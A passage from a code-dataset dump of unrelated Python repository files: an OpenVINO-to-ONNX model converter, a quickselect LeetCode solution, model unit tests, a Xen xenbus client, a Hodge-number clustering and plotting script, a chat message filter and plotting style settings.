to=int(onnx.TensorProto.FLOAT)\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_softmax(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n axis = int(vinode.data['axis'])\n input_shape = one_elem(vinode.input)\n batch_size_axis = 0\n for i,s in enumerate(input_shape):\n if i==axis or i==batch_size_axis:\n continue\n if s == 1:\n continue\n errmsg=\"ERROR: Node {}: input shape {} with axis {} not supported for softmax\\n\"\n sys.stderr.write(errmsg.format(vinode.name,input_shape,axis))\n sys.exit(1)\n\n node = onnx.helper.make_node(\n 'Softmax',\n inputs = inputs,\n outputs = outputs,\n axis=axis,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_transpose(vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n input_shape = vinode.input[0]\n output_shape = vinode.output[0]\n \n perm_node = vinodes[int(inputs[1])]\n perm = perm_node.data['arr'].tolist()\n test_array = np.random.rand(*input_shape)\n if np.array_equal(test_array.reshape(output_shape), test_array.transpose(perm)):\n #transpose is equivalent to reshape\n return gen_reshape(vinode)\n\n if (perm not in ([0,2,3,1],)) and ('reorg' not in vinode.name.lower()):\n sys.stderr.write(\"ERROR:Node {}: permutation '{}' not supported\\n\".format(vinode.name,perm))\n sys.exit(1)\n inputs = inputs[:1]\n node = onnx.helper.make_node('Transpose',\n inputs = inputs,\n outputs = outputs,\n perm = perm,\n name = str(vinode.id))\n nodes.append(node)\n return nodes, inits\n\n\ndef is_constant(vinode, vinodes):\n if vinode.type in ['ShapeOf', 'Const']:\n return True\n elif vinode.type in ['Gather', 'Concat']:\n inputs, outputs = io(vinode)\n return all([is_constant(vinodes[int(i)], vinodes) for i in inputs])\n\n return False\n\n\ndef gen_graph_io(vinodes, nodes):\n inputs = []\n outputs = []\n \n for n in nodes:\n previous_nodes = onnx_helper.get_previous_nodes(nodes, n)\n if len(previous_nodes) == 0:\n #is input node\n vinode = one_elem([vi for vi in vinodes if str(vi.id) == n.name])\n if vinode.type == 'Add':\n #sometimes the node is named after the biasing vinode after it\n #so we need to fine that actual node before it.\n possible_vinode = [vi for vi in vinodes if len(vi._to) and vi.id == vinode._from[0]]\n if len(possible_vinode)!=0:\n vinode = one_elem(possible_vinode)\n\n #TODO Handle more than one input on an input node.\n try:\n constant_inputs = [is_constant(vinodes[int(i)], vinodes) for i in io(vinode)[0]]\n shape = vinode.input[0]\n if constant_inputs[0]:\n shape = vinode.input[1]\n except:\n shape = vinode.output[0]\n inputs.append(onnx.helper.make_tensor_value_info('{}'.format(n.input[0]), onnx.TensorProto.FLOAT, shape))\n next_nodes = []\n for no in n.output:\n next_nodes.extend(onnx_helper.get_node_inputs(nodes,no))\n if len(next_nodes) == 0:\n #is output node\n vinode = one_elem([vi for vi in vinodes if str(vi.id) == n.name])\n #TODO Handle more than one output on an output node.\n shape = vinode.output[0]\n outputs.append(onnx.helper.make_tensor_value_info('{}'.format(n.output[0]), onnx.TensorProto.FLOAT, shape))\n return inputs, outputs\n\n\ndef gen_onnx(vinodes):\n graph_nodes = []\n graph_inits = []\n\n prev_vinode = None\n vidx = 0\n while vidx < len(vinodes):\n vinode = vinodes[vidx]\n if vidx+1 < len(vinodes):\n next_vinode = vinodes[vidx+1]\n else:\n next_vinode = None\n if vinode.type == 'Parameter':\n nodes, inits = gen_input(vinode)\n elif vinode.type == 'PReLU':\n nodes, inits = gen_prelu_10(vinode, vinodes)\n elif vinode.type in ['Result', 'ShapeOf', 'Convert', 'Range']:\n nodes, inits = [],[]\n elif vinode.type == 'Gather':\n if is_constant(vinode, vinodes):\n nodes, inits = [],[]\n else:\n raise NotImplementedError('Non-const {} not implemented'.format(vinode.type))\n continue\n elif vinode.type == 'Const':\n nodes, inits = [], []\n vidx += 1\n continue\n elif vinode.type == 'Multiply':\n nodes, inits = gen_multiply_10(vinode, vinodes)\n elif vinode.type == 'Add':\n nodes, inits = gen_add_10(vinode, vinodes)\n elif vinode.type == 'Convolution':\n bias_vinode = None\n if len(vinodes) > vidx+2 and vinodes[vidx+1].type == 'Const' and vinodes[vidx+2].type == 'Add':\n bias_vinode = vinodes[vidx+2]\n vidx +=2\n nodes, inits = gen_conv_10(vinode, bias_vinode, vinodes)\n elif vinode.type == 'GroupConvolution':\n bias_vinode = None\n if len(vinodes) > vidx+2 and vinodes[vidx+1].type == 'Const' and vinodes[vidx+2].type == 'Add':\n bias_vinode = vinodes[vidx+2]\n vidx +=2\n nodes, inits = gen_group_conv_10(vinode, bias_vinode, vinodes)\n elif vinode.type == 'MatMul':\n bias_vinode = None\n if len(vinodes) > vidx+2 and vinodes[vidx+1].type == 'Const' and vinodes[vidx+2].type == 'Add':\n bias_vinode = vinodes[vidx+2]\n vidx +=2\n nodes, inits = gen_matmul_10(vinode, bias_vinode, prev_vinode, vinodes)\n elif vinode.type == 'ReLU':\n nodes, inits = gen_relu(vinode)\n elif vinode.type == 'Concat':\n if is_constant(vinode, vinodes):\n nodes, inits = [],[]\n else:\n nodes, inits = gen_concat(vinode)\n elif vinode.type == 'Squeeze':\n nodes, inits = gen_reshape(vinode)\n elif vinode.type == 'ReduceMean':\n nodes, inits = gen_reduce_10(vinode)\n elif vinode.type == 'AvgPool':\n nodes, inits = gen_avgpool_10(vinode)\n elif vinode.type == 'MaxPool':\n nodes, inits = gen_maxpool_10(vinode)\n elif vinode.type == 'SoftMax':\n nodes, inits = gen_softmax(vinode)\n elif vinode.type == 'Reshape':\n nodes, inits = gen_reshape(vinode)\n elif vinode.type == 'RegionYolo':\n nodes, inits = gen_reshape(vinode)\n elif vinode.type == 'Flatten':\n nodes, inits = gen_flatten(vinode)\n # elif vinode.type == 'ReorgYolo':\n # nodes, inits = gen_reorg_yolo(vinode)\n elif vinode.type == 'ExtractImagePatches':\n nodes, inits = gen_extract(vinode)\n elif vinode.type == 'Interpolate':\n nodes, inits = gen_interpolate(vinode)\n elif vinode.type == 'Transpose':\n nodes, inits = gen_transpose(vinode, vinodes)\n elif vinode.type == 'Clamp':\n nodes, inits = gen_clamp(vinode)\n elif vinode.type == 'LRN':\n nodes, inits = gen_norm(vinode)\n elif vinode.type == 'TopK':\n nodes, inits = gen_topk(vinode)\n elif vinode.type == 'Pad':\n nodes, inits = gen_pad_10(vinode, vinodes)\n else:\n raise NotImplementedError('{} not implemented'.format(vinode.type))\n continue\n prev_vinode = vinodes[vidx]\n vidx += 1\n graph_nodes += nodes\n graph_inits += inits\n return graph_nodes, graph_inits\n\n\ndef gen_pad_graph():\n\n X = onnx.helper.make_tensor_value_info('X', onnx.TensorProto.FLOAT, (1,2))\n Y = onnx.helper.make_tensor_value_info('Y', onnx.TensorProto.FLOAT, (1,4))\n\n\n node = onnx.helper.make_node(\n 'Pad',\n ['X'],\n ['Y'],\n mode='constant',\n pads=[0,1,0,1],\n value=1.5,\n )\n nodes = [node]\n inputs = [X]\n outputs = [Y]\n initializers = []\n\n graph = onnx.helper.make_graph(\n nodes,\n 'pad-graph',\n inputs,\n outputs,\n initializers,\n )\n\n return graph\n\n\ndef gen_softmax_graph():\n\n X = onnx.helper.make_tensor_value_info('X', onnx.TensorProto.FLOAT, (1,1000))\n Y = onnx.helper.make_tensor_value_info('Y', onnx.TensorProto.FLOAT, (1,1000))\n\n\n node = onnx.helper.make_node(\n 'Softmax',\n ['X'],\n ['Y'],\n )\n nodes = [node]\n inputs = [X]\n outputs = [Y]\n initializers = []\n\n graph = onnx.helper.make_graph(\n nodes,\n 'softmax-graph',\n inputs,\n outputs,\n initializers,\n )\n\n return graph\n\n\ndef convert_openvino_xml_to_onnx(vinodes, graph_name, version):\n assert(version == '10')\n nodes, inits = gen_onnx(vinodes)\n inputs, outputs = gen_graph_io(vinodes, nodes)\n\n for input in inputs:\n input.type.tensor_type.shape.dim[0].dim_param = \"N\"\n for output in outputs:\n output.type.tensor_type.shape.dim[0].dim_param = \"N\"\n\n graph = onnx.helper.make_graph(\n nodes,\n graph_name,\n inputs,\n outputs,\n inits,\n )\n\n return graph\n\n\ndef save_stats(nodes, output_file):\n stats = []\n for node in nodes:\n if not (node.min is None) and not (node.max is None):\n if not (node.mean is None):\n stats.append({\n 'name': node.name, 'id': node.id,\n 'min': node.min.tolist(), 'max': node.max.tolist(), 'mean': node.mean.tolist(),\n 'input': node.input, 'output': node.output})\n else:\n stats.append({\n 'name': node.name, 'id': node.id,\n 'min': node.min.tolist(), 'max': node.max.tolist(),\n 'input': node.input, 'output': node.output})\n\n with open(output_file, 'w') as f:\n json.dump(stats, f)\n\n\ndef cut_after_node(nodes, cut):\n cut_nodes = []\n for n in nodes:\n if n.name == cut:\n max_id = n.id\n\n for n in nodes:\n if n.id < max_id:\n cut_nodes.append(n)\n elif n.id == max_id:\n n._to = []\n cut_nodes.append(n)\n\n return cut_nodes\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('xml')\n parser.add_argument('-s', '--stats', action='store_true')\n parser.add_argument('-r', '--random', action='store_true')\n parser.add_argument('-i', '--image')\n parser.add_argument('-t', '--topk', action='store_true')\n parser.add_argument('-j', '--json', action='store_true')\n parser.add_argument('-c', '--cut')\n args = parser.parse_args()\n\n model_name = args.xml.split('.xml')[0]\n onnx_name = '{}.onnx'.format(model_name)\n\n nodes, ir_version = parse_openvino_xml(args.xml)\n if args.cut:\n nodes = cut_after_node(nodes, args.cut)\n\n graph = convert_openvino_xml_to_onnx(nodes, model_name, ir_version)\n onnx_save_model(graph, onnx_name)\n\n if args.stats: # save layer statistics\n save_stats(nodes, model_name)\n\n if args.random: # test random input\n input_array = onnx_random_input(onnx_name)\n output = onnx_infer(onnx_name, input_array)\n if args.topk:\n imagenet.print_topk(output.flatten())\n\n if args.image: # test input image\n input_array = load_image(args.image)\n output = onnx_infer(onnx_name, input_array)\n if args.topk:\n imagenet.print_topk(output.flatten())\n if args.json:\n with open('{}.json'.format(onnx_name), 'w') as f:\n json.dump(output.flatten().tolist(), f)\n","repo_name":"Umair772/VectorBlox-SDK","sub_path":"python/vbx/vbx/generate/onnx_convert.py","file_name":"onnx_convert.py","file_ext":"py","file_size_in_byte":53206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"17280392524","text":"\"\"\"\nQuestions:\nGiven an integer array nums and an integer k, return the kth largest element in the array.\nNote that it is the kth largest element in the sorted order, not the kth distinct element.\nExample 1:\nInput: nums = [3,2,1,5,6,4], k = 2\nOutput: 5\n\nSoln:\nquicksort, random pick pivot and arrange smaller nums on left and count\nif count < k then go to right section and repeat\nif count >k, then go to left section and repeat\nif count == k, return \n\"\"\"\nclass Solution(object):\n def findKthLargest(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n return self.findKthSmallest(nums, 0, len(nums)-1, len(nums)+ 1 - k)\n \n def findKthSmallest(self, nums, left, right, k):\n import random\n if left == right:\n return nums[left]\n pivot = random.randint(left, right)\n idx = self.partition(nums, left, right, pivot)\n if idx +1 == k:\n return nums[idx]\n elif idx + 1 > k:\n return self.findKthSmallest(nums, left, idx-1, k)\n else:\n return self.findKthSmallest(nums, idx+1, right, k)\n \n def partition(self, nums, left, right, pivot):\n val = nums[pivot]\n nums[pivot], nums[right] = nums[right], nums[pivot]\n j = left\n for i in range(left, right):\n if nums[i] < val:\n nums[i], nums[j] = nums[j], nums[i]\n j+=1\n nums[right], nums[j] = nums[j], nums[right]\n return j ","repo_name":"GaaryApple/MyLeetcode","sub_path":"215_Kth_Largest_Elements_in_an_array/215_Kth_Largest_Elements_in_an_array.py","file_name":"215_Kth_Largest_Elements_in_an_array.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"134902629","text":"import pytest\nimport io\nimport json\nfrom stand import models\n\n\ndef test_serpset_by_metrics_filename():\n print()\n metrics_filename = 'data/10681888.json.gz'\n scales = ['RELEVANCE']\n serpset = models.Serpset(metrics_filename=metrics_filename, scales=scales)\n assert len(serpset.queries) == 2015\n assert sum(1 for query, docs in serpset if docs) == 2014\n # for all docs there're query, url and pos fields\n assert all((doc.query is not None) and (doc.url is not None) and (doc.pos is not None) for doc in serpset.docs)\n # for every scale there's at least one document containing it\n assert all(any(scale in doc.scales for doc in serpset.docs) for scale in scales)\n\n\ndef test_serpset_by_filename():\n print()\n data = {\n \"some_query\": [\n {\n \"url\": \"some_url\",\n \"qid\": \"1332\"\n }\n ]\n }\n data_filename = \"data/tmp.json\"\n with open(data_filename, \"w\") as f:\n json.dump(data, f)\n serpset = models.Serpset(filename=data_filename)\n assert len(serpset.docs) == 1\n assert serpset.docs[0].qid == \"1332\"\n\n\ndef test_serpset_actions():\n print()\n serpset = models.Serpset()\n serpset.add_query('query_1')\n serpset.add_doc('query_2', url='http://fake.url')\n assert len(serpset.queries) == 2\n assert len(serpset['query_1']) == 0\n assert len(serpset['query_2']) == 1\n assert serpset['query_2'][0].query == 'query_2'\n assert serpset['query_2'][0].url == 'http://fake.url'\n assert serpset['query_2'][0].pos == 0\n assert serpset['query_2'][0].scales is None\n assert serpset['query_2'][0].mimca is None\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"extsearch/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33836836622","text":"#!/usr/bin/env python\n\nimport logging\nimport os\nimport sys\nimport struct\n\nlog = logging.getLogger(__name__)\n\nXS_LIST = 1\nXS_READ = 2\nXS_WRITE = 11\nXS_RM = 13\nXS_ERROR = 16\nXS_HDR_SZ = 16\n\nNUL = b'\\x00'\n\n\nclass XSOps(object):\n def __init__(self):\n self.vals = [XS_LIST, XS_READ, XS_WRITE, XS_RM]\n\n def __iter__(self):\n return iter(self.vals)\n\n\nclass ProcXenBus(object):\n\n def __enter__(self):\n self.fd = os.open(\"/proc/xen/xenbus\", os.O_RDWR)\n self.ops = XSOps()\n self.rq_id = -1\n return self\n\n def __exit__(self, *exc_info):\n os.close(self.fd)\n\n #\n # Public methods\n #\n def read(self, path):\n self.__exec_cmd(XS_READ, path)\n (op, rq_id, tx_id, size) = self.__get_header()\n\n result = ''\n if self.__error_chk(XS_READ, op, size):\n return result\n return os.read(self.fd, size) if size > 0 else result\n\n def list(self, path):\n self.__exec_cmd(XS_LIST, path)\n (op, rq_id, tx_id, size) = self.__get_header()\n\n result = []\n if self.__error_chk(XS_LIST, op, size):\n return result\n\n if size > 0:\n data = os.read(self.fd, size)\n data = data.decode('utf-8').rstrip(NUL)\n for item in data.split(NUL):\n result.append(item)\n return result\n\n def write(self, path, data):\n self.__exec_cmd(XS_WRITE, path, data)\n (op, rq_id, tx_id, size) = self.__get_header()\n\n result = ''\n if self.__error_chk(XS_WRITE, op, size):\n return result\n\n if size > 0:\n status = os.read(self.fd, size)\n if status.decode('utf-8').rstrip(NUL) != b\"OK\":\n raise RuntimeError('write: unable to store value')\n return\n\n def delete(self, path):\n self.__exec_cmd(XS_RM, path)\n (op, rq_id, tx_id, size) = self.__get_header()\n\n result = ''\n if self.__error_chk(XS_RM, op, size):\n return result\n return os.read(self.fd, size) if size > 0 else result\n\n #\n # Private methods\n #\n def __exec_cmd(self, op, path, data=None):\n if op not in self.ops:\n raise ValueError('Invalid Operation Specified')\n\n if data is None:\n wlen = len(path) + 1\n wdat = path + NUL\n else:\n byts = bytes(data.decode('utf-8').rstrip(NUL))\n wlen = len(path) + 1 + len(byts)\n wdat = path + NUL + byts\n\n rq_id = self.__next_rq_id()\n os.write(self.fd, struct.pack(\" 0:\n msg = os.read(self.fd, resz)\n msg = msg.decode('utf-8').rstrip(NUL)\n log.debug('%s: got %s from xenstore',\n self.__op_to_str(cop), msg)\n return -1\n elif resop != cop:\n log.debug('%s: xenstore returned bad op %d',\n self.__op_to_str(cop), resop)\n if resz > 0:\n os.read(self.fd, resz)\n return -2\n return 0\n\n def __dump_header(self, header):\n (op, rq_id, tx_id, size) = struct.unpack(\"5\nh = 0 #...choose: 0 for h11, 1 for h21\n\n#Plot scatter graph across CY dataset\nplt.figure('Hodge Number Correlations: '+str(w_idx))\nplt.scatter(CY[:,w_idx-1],Hodge[:,h],alpha=0.1)\nplt.xlabel(r'$weight $ '+str(w_idx))\nplt.ylabel(r'$h^{2,1}$')\nplt.tight_layout()\nplt.grid()\n#plt.savefig('h21_vs_w'+str(w_idx)+'.pdf')\n\n#%% #3d plot each weight vs h11 and h21\n#Select weight to plot\nw_idx = 5\n\n#Plot 3d scatter graph with both Hodge numbers\nfig = plt.figure()\nax = Axes3D(fig)\nax.scatter(CY[:,w_idx-1],Hodge[:,0],Hodge[:,1],alpha=0.1)\nax.set_xlabel(r'$weight $ '+str(w_idx))\nax.set_ylabel(r'$h^{1,1}$')\nax.set_zlabel(r'$h^{2,1}$')\nax.view_init(30, 30) #...adjust viewpoint of 3d plot here\nax.xaxis.labelpad=15\nax.yaxis.labelpad=12\nax.zaxis.labelpad=12\nax.dist = 12.5\n#plt.savefig('./3d_w'+str(w_idx)+'_vs_hs.pdf')\n\n#%% #Plot each weight vs Euler number\n#Select weight to plot\nw_idx = 5\nplt.figure('Weights vs Euler number')\nplt.scatter(CY[:,w_idx-1],[-2*(y[0]-y[1]) for y in Hodge],alpha=0.1)\nplt.xlabel(r'$weight $ '+str(w_idx))\nplt.ylabel(r'$\\chi$')\nplt.grid()\n#plt.savefig('Euler_vs_w'+str(w_idx)+'.pdf')\n\n\n################################################################################\n'''Clustering'''\n#%% #Plot histogram of h11/w5 gradient data\n#Select hyperparams to consider\nw_idx = 5 #...choose weight to plot: 1->5\nh = 0 #...choose: 0 for h11, 1 for h21\nall_data = False #...choose whether to plot ratios for all the data, or just the 'outer' data\n\nif all_data:\n raw_k_data = np.array([float(Hodge[x][h])/CY[x][w_idx-1] for x in range(len(CY))])\n plt.hist(raw_k_data,bins=int(max(raw_k_data)*50),range=(0,max(raw_k_data)+0.01),histtype='step')\nelse:\n raw_outer_k_data = np.array([float(Hodge[x][h])/CY[x][w_idx-1] for x in range(len(CY)) if CY[x][w_idx-1] > 250])\n plt.hist(raw_outer_k_data,bins=int(max(raw_outer_k_data)*50),range=(0,max(raw_outer_k_data)+0.01),histtype='step')\n#for clust_cent in kmeans.cluster_centers_.flatten(): plt.axvline(x=clust_cent,color='black',lw=0.8,linestyle='--') #...unhash this to add the cluster centres to the plot (must run subsequent cell first to define them)\nplt.xlabel(r'$h^{1,1}/w_5$')\nplt.ylabel('Frequency')\nplt.grid()\nplt.tight_layout()\n#plt.savefig('grad(h11w5)_histogram.pdf')\n\n#%% #Perform K-Means clustering\n#Select hyperparams to consider\nw_idx = 5 #...choose weight to plot: 1->5\nh = 0 #...choose: 0 for h11, 1 for h21\nall_data = False #...choose whether to cluster based on all the data, or focus on the outer data where classes more prominent\npreset_number_clusters = 0 #...set to chosen number of clusters, or to zero to determine optimal number of clusters\nmax_inertia = True #...select True to calculate optimum number of clusters using max distance to a cluster ('max-inertia'), or False to use average distance (inertia)\n\n#Define datasets of ratios, one with only 'outer' data to encourage good cluster identification\nall_ratio_data = np.array([float(Hodge[x][h])/CY[x][w_idx-1] for x in range(len(CY))]).reshape(-1,1)\nouter_ratio_data = np.array([float(Hodge[x][h])/CY[x][w_idx-1] for x in range(len(CY)) if CY[x][w_idx-1] > 250]).reshape(-1,1) #...update cutoff if not considering h11 vs w5\n\nif all_data: ratio_data = all_ratio_data\nelse: ratio_data = outer_ratio_data\n\n#Run K-Means CLustering\nif preset_number_clusters:\n #Perform K-Means clustering (use preset number of clusters)\n kmeans = KMeans(n_clusters=preset_number_clusters).fit(ratio_data) \nelse:\n if max_inertia:\n #Plot scaled max-inertia distribution to determine optimal number of clusters\n max_dists = []\n #Compute single cluster max squared distance\n kmeans = KMeans(n_clusters=1).fit(ratio_data)\n transformed_data = kmeans.transform(ratio_data) \n single_clust_max_dist = max([min(x)**2 for x in transformed_data])\n #Compute the max distances to nearest cluster for each datapoint for all numbers of clusters\n for k in range(1,21):\n kmeans = KMeans(n_clusters=k).fit(ratio_data)\n transformed_data = kmeans.transform(ratio_data) #...data transformed to list distance to all centres\n max_dists.append(max([min(x)**2 for x in transformed_data])/single_clust_max_dist + 0.01*(k-1)) #...compute the scaled max distance over the full dataset\n \n #Determine optimal number of clusters\n k_optimal = list(range(1,21))[max_dists.index(min(max_dists))]\n print('Optimal number of clusters: '+str(k_optimal))\n \n plt.figure('K-Means Max-Inertia')\n plt.scatter(list(range(1,21)),max_dists)\n plt.xlabel('Number of Clusters')\n plt.xticks(range(21))\n plt.ylabel('Scaled Max-Inertia')\n plt.ylim(0,1.05)\n plt.grid()\n plt.tight_layout()\n #plt.savefig('./KMeansScaledMaxSquared-Distance.pdf')\n\n else:\n #Plot scaled inertia distribution to determine optimal number of clusters\n inertia_list = []\n single_clust_inertia = KMeans(n_clusters=1).fit(ratio_data).inertia_\n for k in range(1,21):\n scaled_inertia = KMeans(n_clusters=k).fit(ratio_data).inertia_ / single_clust_inertia + 0.01*(k-1)\n inertia_list.append(scaled_inertia)\n \n #Determine optimal number of clusters\n k_optimal = list(range(1,21))[inertia_list.index(min(inertia_list))]\n print('Optimal number of clusters: '+str(k_optimal))\n \n plt.figure('K-Means Inertia')\n plt.scatter(list(range(1,21)),inertia_list)\n plt.xlabel('Number of Clusters')\n plt.xticks(range(21))\n plt.ylabel('Scaled Inertia')\n plt.ylim(0,1.05)\n plt.grid()\n plt.tight_layout()\n #plt.savefig('./KMeansInertia.pdf')\n \n #Perform K-Means clustering (use computed optimal number of clusters)\n kmeans = KMeans(n_clusters=k_optimal).fit(ratio_data) \n\n#Compute clustering over the full ratio data (irrespective of whether full or outer used to identify clusters)\ntransformed_full_data = kmeans.transform(all_ratio_data) #...data transformed to list distance to all centres\nkmeans_labels = np.argmin(transformed_full_data,axis=1) #...identify the closest cluster centre to each datapoint\nfull_data_inertia = np.sum([min(x)**2 for x in transformed_full_data]) #...compute the inertia over the full dataset\ncluster_sizes = Counter(kmeans_labels) #...compute the frequencies in each cluster\nprint('\\nCluster Centres: '+str(kmeans.cluster_centers_.flatten())+'\\nCluster sizes: '+str([cluster_sizes[x] for x in range(10)])+'\\n\\nInertia: '+str(full_data_inertia)+'\\nNormalised Inertia: '+str(full_data_inertia/7555)+'\\nNormalised Inertia / range: '+str((full_data_inertia/(7555*(max(all_ratio_data)-min(all_ratio_data))))[0]))\n\n#%% #Plot full data with cluster centre lines overlaid\nplt.figure('K-Means centres overlaid')\nplt.scatter(CY[:,w_idx-1],Hodge[:,h],alpha=0.1)\nfor grad in kmeans.cluster_centers_.flatten():\n plt.plot(np.linspace(0,2000,2),grad*np.linspace(0,2000,2),color='black',lw=0.5)\nplt.xlim(0,1800)\nplt.ylim(0,np.round(max(Hodge[:,h]),-1)+50)\nplt.xlabel(r'$weight $ '+str(w_idx))\nplt.ylabel(r'$h^{1,1}$')\nplt.tight_layout()\nplt.grid()\n#plt.savefig('kmeans_overlaidcentres_h11vsw'+str(w_idx)+'.pdf')\n\n#%% #Plot data with cluster bounds overlaid\ncentres = np.sort(kmeans.cluster_centers_.flatten())\ncluster_bounds = (centres[:-1]+centres[1:])/2\n\nplt.figure('K-Means bounds overlaid')\nplt.scatter(CY[:,w_idx-1],Hodge[:,h],alpha=0.1)\nfor grad in cluster_bounds:\n plt.plot(np.linspace(0,2000,2),grad*np.linspace(0,2000,2),color='black',lw=0.5)\nplt.xlim(0,1800)\nplt.ylim(0,np.round(max(Hodge[:,h]),-1)+50)\nplt.xlabel(r'$weight $ '+str(w_idx))\nplt.ylabel(r'$h^{1,1}$')\nplt.tight_layout()\nplt.grid()\n#plt.savefig('kmeans_overlaidbounds_h11vsw'+str(w_idx)+'.pdf')\n\n#%% #Plot the clusters in different colours\nplt.figure('K-Means clusters coloured')\nfor cluster_idx in list(range(len(cluster_sizes))):\n plt.scatter([CY[x][w_idx-1] for x in range(len(CY)) if kmeans_labels[x] == cluster_idx],[Hodge[y][h] for y in range(len(Hodge)) if kmeans_labels[y] == cluster_idx],alpha=0.1)\nplt.xlim(0,1800)\nplt.ylim(0,np.round(max(Hodge[:,h]),-1)+50)\nplt.xlabel(r'$weight $ '+str(w_idx))\nplt.ylabel(r'$h^{1,1}$')\nplt.tight_layout()\nplt.grid()\n#plt.savefig('kmeans_clusterscoloured_h11vsw'+str(w_idx)+'.pdf')\n\n#%% #Save the outer data in each cluster to a file for comparison\n#Identify the number of clusters\nif preset_number_clusters: number_clusters = preset_number_clusters\nelse: number_clusters = k_optimal\n#Extract outer data and cluster labels\nCY_outer = [list(CY[x]) for x in range(len(CY)) if CY[x][w_idx-1] > 250]\nCY_outer_lables = kmeans.labels_\n#Sort into respective clusters\nclusters = [[] for i in range(number_clusters)]\nfor v_idx in range(len(CY_outer)):\n clusters[CY_outer_lables[v_idx]].append(list(CY_outer[v_idx]))\n#Save to a file\nwith open('./CluseredOuterData.txt','w') as file:\n file.write('Cluster Sorted Outer Data: (note clusters not ordered)')\n for c_idx in range(len(clusters)-1):\n file.write('\\n\\nCluster '+str(c_idx+1)+' (centre: '+str(kmeans.cluster_centers_.flatten()[c_idx])+')\\n'+str(clusters[c_idx])+'\\n\\n##########')\n file.write('\\n\\nCluster '+str(len(clusters))+' (centre: '+str(kmeans.cluster_centers_.flatten()[-1])+')\\n'+str(clusters[-1]))\n ","repo_name":"edhirst/P4CY3ML","sub_path":"HodgePlots.py","file_name":"HodgePlots.py","file_ext":"py","file_size_in_byte":10040,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"43599742276","text":"from ShareChat.exception import ShareChatException\nfrom ShareChat.logger import logging\nimport os , sys\n\nclass ChatMessage:\n\n def filter_message_address(self,RecieveDat):\n \"\"\"Function returns message , ip address , port no\"\"\"\n try:\n logging.info('filtering the recieving data !')\n message = RecieveDat[0]\n if message[0:1] != b'2':\n message = message.decode('ascii')\n address = RecieveDat[1]\n ip_address = address[0]\n port_no = address[1]\n logging.info(f\"successfully filter Recieve Data of the :- {ip_address}\")\n return message , ip_address , port_no\n else:\n address = RecieveDat[1]\n ip_address = address[0]\n port_no = address[1]\n logging.info(f\"successfully filter Recieve Data of the :- {ip_address}\")\n return message , ip_address , port_no\n\n except Exception as e:\n raise ShareChatException(e,sys)","repo_name":"Ranjit-Singh-786/Ai_ShareChat","sub_path":"ShareChat/component/chat_message.py","file_name":"chat_message.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29682699018","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport numpy as np\n\nargs1 = {'astar': {'color': 'grey'},\n 'beam5': {'color': 'deeppink'},\n 'beam10': {'color': 'b'},\n 'beam20': {'color': 'forestgreen'},\n 'beam40': {'color': 'darkorange'},\n 'beam80': {'color': 'cyan'},\n 'hungarian': {'color': 'deepskyblue'},\n 'vj': {'color': 'darkcyan'},\n 'graph2vec': {'color': 'darkcyan'},\n 'siamese': {'color': 'red'},\n 'transductive': {'color': 'red'}}\n\n\nargs2 = {'astar': {'marker': '*', 'facecolors': 'none', 'edgecolors': 'grey'},\n 'beam5': {'marker': '|', 'facecolors': 'deeppink'},\n 'beam10': {'marker': '_', 'facecolors': 'b'},\n 'beam20': {'marker': 'D', 'facecolors': 'none',\n 'edgecolors': 'forestgreen'},\n 'beam40': {'marker': '^', 'facecolors': 'none',\n 'edgecolors': 'darkorange'},\n 'beam80': {'marker': 's', 'facecolors': 'none', 'edgecolors': 'cyan'},\n 'hungarian': {'marker': 'X', 'facecolors': 'none',\n 'edgecolors': 'deepskyblue'},\n 'vj': {'marker': 'h', 'facecolors': 'none',\n 'edgecolors': 'darkcyan'},\n 'graph2vec': {'marker': 'h', 'facecolors': 'none',\n 'edgecolors': 'darkcyan'},\n 'siamese': {'marker': 'P',\n 'facecolors': 'none', 'edgecolors': 'red'},\n 'transductive': {'marker': 'P',\n 'facecolors': 'none', 'edgecolors': 'red'}\n }\n\n\nTYPE_COLOR_MAP = {\n 'C': '#ff6666',\n 'O': 'lightskyblue',\n 'N': 'yellowgreen',\n 'movie': '#ff6666',\n 'tvSeries': '#ff6666',\n 'actor': 'lightskyblue',\n 'actress': '#ffb3e6',\n 'director': 'yellowgreen',\n 'composer': '#c2c2f0',\n 'producer': '#ffcc99',\n 'cinematographer': 'gold'}\n\n\nfont2 = {'family': 'Times New Roman',\n 'weight': 'normal',\n 'size': 30, }\n\n\nif __name__ == '__main__':\n # aids Beam80 79.604 Beam1 14.222 Beam2\n # linux Beam80 30.788 Beam1 11.358 Beam2\n # imdb Beam80 139.266 Beam1 0 Beam2\n # name_list = ['A*', 'Beam80', 'Beam\\n1', 'Hung\\narian', 'VJ', 'Avg',\n # 'GCN\\nMean\\nPool', 'GCN\\nMax\\nPool', 'Att\\nDeg',\n # 'Att\\nCout', 'Att\\nTrans\\nCout', 'SimGNN']\n name_list = ['A*', 'Beam', 'Hung\\narian', 'VJ', 'SimpleMean',\n 'HierarchicalMean', 'HierarchicalMax', 'AttDegree',\n 'AttGlobalContext', 'AttLearnableGC', 'SimGNN']\n num_list_aids = [5540.527, 19.026, 5.726, 8.801, 1.728, 2.139, 2.131, 1.586, 1.678, 1.681, 2.549]\n num_list_linux = [534.505, 7.923, 3.684, 4.735, 1.444, 2.185, 2.166, 1.929, 1.964, 2.084, 2.517]\n num_list_imdb = [0, 139.266, 120.349, 135.264, 1.371, 2.764, 2.865, 